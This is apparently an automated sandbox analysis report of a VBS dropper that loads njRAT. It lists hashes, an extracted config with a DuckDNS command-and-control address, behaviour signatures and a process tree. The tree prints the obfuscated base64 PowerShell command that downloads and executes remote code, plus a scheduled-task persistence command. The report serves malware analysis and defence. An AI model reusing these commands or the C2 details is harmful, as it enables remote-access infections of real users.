Analysis
-
max time kernel
144s -
max time network
142s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
21-12-2021 08:19
Static task
static1
Behavioral task
behavioral1
Sample
P48274Q89.vbs
Resource
win7-en-20211208
General
-
Target
P48274Q89.vbs
-
Size
872B
-
MD5
028b34eb17d379cf3688e72225cd95da
-
SHA1
851db5268715999fc8db2d6292096d19e3830d3b
-
SHA256
29bd0ab3b7cb939a7def1c4e4bb78c3c9d7e19d580e6292b155e89b13820309f
-
SHA512
8e1be3d7de63e20e5d8737486b123dff598894bab17f15e69e2ac0f648e4d52b81e261aff26657fc4533ed20845d921e8aec1df2333fe8eeb1ab6d0763975405
Malware Config
Extracted
njrat
v2.0
HacKed
sxeodus12.duckdns.org:5552
Windows
-
reg_key
Windows
-
splitter
|-F-|
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 11 1524 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
win_media.exepid process 1068 win_media.exe -
Drops startup file 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk aspnet_compiler.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process target process PID 1524 set thread context of 3668 1524 powershell.exe aspnet_compiler.exe PID 3668 set thread context of 2104 3668 aspnet_compiler.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1524 powershell.exe 1524 powershell.exe 1524 powershell.exe -
Suspicious use of AdjustPrivilegeToken 33 IoCs
Processes:
powershell.exeaspnet_compiler.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 1524 powershell.exe Token: SeDebugPrivilege 3668 aspnet_compiler.exe Token: SeDebugPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe Token: 33 2104 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2104 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 40 IoCs
Processes:
WScript.execmd.execmd.exepowershell.exeaspnet_compiler.execmd.exedescription pid process target process PID 3800 wrote to memory of 612 3800 WScript.exe cmd.exe PID 3800 wrote to memory of 612 3800 WScript.exe cmd.exe PID 612 wrote to memory of 1120 612 cmd.exe cmd.exe PID 612 wrote to memory of 1120 612 cmd.exe cmd.exe PID 1120 wrote to memory of 1240 1120 cmd.exe cmd.exe PID 1120 wrote to memory of 1240 1120 cmd.exe cmd.exe PID 1120 wrote to memory of 1352 1120 cmd.exe findstr.exe PID 1120 wrote to memory of 1352 1120 cmd.exe findstr.exe PID 612 wrote to memory of 1524 612 cmd.exe powershell.exe PID 612 wrote to memory of 1524 612 cmd.exe powershell.exe PID 1524 wrote to memory of 3668 1524 powershell.exe aspnet_compiler.exe PID 1524 wrote to memory of 3668 1524 powershell.exe aspnet_compiler.exe PID 1524 wrote to memory of 3668 1524 powershell.exe aspnet_compiler.exe PID 1524 wrote to memory of 3668 1524 powershell.exe aspnet_compiler.exe PID 1524 wrote to memory of 3668 1524 powershell.exe aspnet_compiler.exe PID 1524 wrote to memory of 3668 1524 powershell.exe aspnet_compiler.exe PID 1524 wrote to memory of 3668 1524 powershell.exe aspnet_compiler.exe PID 1524 wrote to memory of 3668 1524 powershell.exe aspnet_compiler.exe PID 3668 wrote to memory of 2104 3668 aspnet_compiler.exe aspnet_compiler.exe PID 3668 wrote to memory of 2104 3668 aspnet_compiler.exe aspnet_compiler.exe PID 3668 wrote to memory of 2104 3668 aspnet_compiler.exe aspnet_compiler.exe PID 3668 wrote to memory of 2104 3668 aspnet_compiler.exe aspnet_compiler.exe PID 3668 wrote to memory of 2104 3668 aspnet_compiler.exe aspnet_compiler.exe PID 3668 wrote to memory of 2104 3668 aspnet_compiler.exe aspnet_compiler.exe PID 3668 wrote to memory of 2104 3668 aspnet_compiler.exe aspnet_compiler.exe PID 3668 wrote to memory of 2104 3668 aspnet_compiler.exe aspnet_compiler.exe PID 3668 wrote to memory of 1068 3668 aspnet_compiler.exe win_media.exe PID 3668 wrote to memory of 1068 3668 aspnet_compiler.exe win_media.exe PID 3668 wrote to memory of 436 3668 aspnet_compiler.exe cmd.exe PID 3668 wrote to memory of 436 3668 aspnet_compiler.exe cmd.exe PID 3668 wrote to memory of 436 3668 aspnet_compiler.exe cmd.exe PID 3668 wrote to memory of 1440 3668 aspnet_compiler.exe cmd.exe PID 3668 wrote to memory of 1440 3668 aspnet_compiler.exe cmd.exe PID 3668 wrote to memory of 1440 3668 aspnet_compiler.exe cmd.exe PID 3668 wrote to memory of 952 3668 aspnet_compiler.exe cmd.exe PID 3668 wrote to memory of 952 3668 aspnet_compiler.exe cmd.exe PID 3668 wrote to memory of 952 3668 aspnet_compiler.exe cmd.exe PID 1440 wrote to memory of 1296 1440 cmd.exe schtasks.exe PID 1440 wrote to memory of 1296 1440 cmd.exe schtasks.exe PID 1440 wrote to memory of 1296 1440 cmd.exe schtasks.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\P48274Q89.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c FOR /F "tokens=11 delims=s\" %g IN ('set^|findstr PSM') do %g -e JAB3AGUAYgByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AagB1AHMAdABpAGMAZQBtAG8AdQBuAHQALgB4AHkAegAvAHMAZQBlAC8AUABlAC0AQwBvAGQAZQAuAHQAeAB0ACcAKQA7ACQAcgBlAHMAcAA9ACQAdwBlAGIAcgBlAHEALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJAByAGUAcwBwAHMAdAByAGUAYQBtAD0AJAByAGUAcwBwAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAcgBlAGEAZABlAHIAPQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAXQA6ADoAbgBlAHcAKAAkAHIAZQBzAHAAcwB0AHIAZQBhAG0AKQA7ACQAYwBvAG4AdABlAG4AdAA9ACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAkAGMAbwBuAHQAZQBuAHQAIAB8ACAAaQBlAHgA2⤵
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c set|findstr PSM3⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set"4⤵PID:1240
-
C:\Windows\system32\findstr.exefindstr PSM4⤵PID:1352
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -e JAB3AGUAYgByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AagB1AHMAdABpAGMAZQBtAG8AdQBuAHQALgB4AHkAegAvAHMAZQBlAC8AUABlAC0AQwBvAGQAZQAuAHQAeAB0ACcAKQA7ACQAcgBlAHMAcAA9ACQAdwBlAGIAcgBlAHEALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJAByAGUAcwBwAHMAdAByAGUAYQBtAD0AJAByAGUAcwBwAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAcgBlAGEAZABlAHIAPQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAXQA6ADoAbgBlAHcAKAAkAHIAZQBzAHAAcwB0AHIAZQBhAG0AKQA7ACQAYwBvAG4AdABlAG4AdAA9ACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAkAGMAbwBuAHQAZQBuAHQAIAB8ACAAaQBlAHgA3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\win_media.exe"C:\Users\Admin\AppData\Local\Temp\win_media.exe"5⤵
- Executes dropped EXE
PID:1068 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\windowmedia"5⤵PID:436
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\windowmedia\windowmedia.exe'" /f5⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\windowmedia\windowmedia.exe'" /f6⤵
- Creates scheduled task(s)
PID:1296 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c copy "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "C:\Users\Admin\AppData\Roaming\windowmedia\windowmedia.exe"5⤵PID:952
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
e1a187b7f7fda5bce6eb1e053ba15bc3
SHA19a5dbb4f6c3e1a01d6d2d25f620a3e3a66876a73
SHA25689c31847f4c22cfe3e8098d3ae2875f474929e3bf1fcb2bf7c9e90713719cd82
SHA51242024a781cf74d066671d365c1a27ed15716d74dd51e3511e2dd62a6dd2aa2ec2cdc42d48f731f379037ab7338a3df28c3cbfdd7b2f11f5c2cd3b1edc1a895f6
-
MD5
e1a187b7f7fda5bce6eb1e053ba15bc3
SHA19a5dbb4f6c3e1a01d6d2d25f620a3e3a66876a73
SHA25689c31847f4c22cfe3e8098d3ae2875f474929e3bf1fcb2bf7c9e90713719cd82
SHA51242024a781cf74d066671d365c1a27ed15716d74dd51e3511e2dd62a6dd2aa2ec2cdc42d48f731f379037ab7338a3df28c3cbfdd7b2f11f5c2cd3b1edc1a895f6